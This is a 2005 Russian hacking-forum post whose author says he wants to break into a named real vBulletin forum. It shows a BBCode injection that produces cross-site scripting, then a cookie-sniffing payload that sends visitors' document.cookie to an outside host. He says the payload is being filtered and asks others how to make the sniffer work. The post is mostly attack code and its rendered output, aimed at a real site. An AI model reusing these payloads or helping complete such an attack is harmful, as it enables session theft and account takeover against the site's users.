Форум АНТИЧАТ - Проблемы с vBulletin

Проблемы с vBulletin

18.12.2005, 03:49

KP0T

Новичок

Регистрация: 13.03.2005

Сообщений: 29

Провел на форуме:
111754

Репутация: 0

Проблемы с vBulletin

Короче хочу ломануть вот этот форумчик _http://forum.polarnet.ru/

вот этот код

Код:

[HTML]http://www.wj.com]wj wj[/URL]

даёт нам что-то типа

Код:

[HTML]<A href='http://www.wj.com<a href="http://www.wj.com' target=_blank>wj 
<FONT onmouseover=alert(/Hello_from_WJ/) face='"Arial' size=+7 &quot;>wj</FONT>" 
target="_blank"&gt;http://www.wj.com]wj &lt;font face="Ar.../) 
/"&gt;wj&lt;/font&gt;</A></A>

Отсюда делаем вывод что xxs возможна, но как снифер поюзать?! вот в чём вопрос, потому что код типа

Код:

[HTML]http://www.wj.com]wj[FONT=Arial size=+7 style=background:url(javascript:document.images[1].src="http://narod.ws/xss/s.gif?"+document.cookie); /]wj [/FONT][/URL]

Нехрена нам не даёт, а именно в сорцах всё смотрится так

Код:

[HTML]<A href='http://www.wj.com<a href="http://www.wj.com' 
target=_blank>wj[FONT=Arial size=+7 
style=background:url(javascript<B></B>:document.images[1].src="http://narod.ws/xss/s.gif?"+document.cookie); 
/]wj [/FONT]" target="_blank"&gt;http://www.wj.com]wj[FONT=Arial...]wj 
[/FONT</A>

Вообщем ай нид хелп.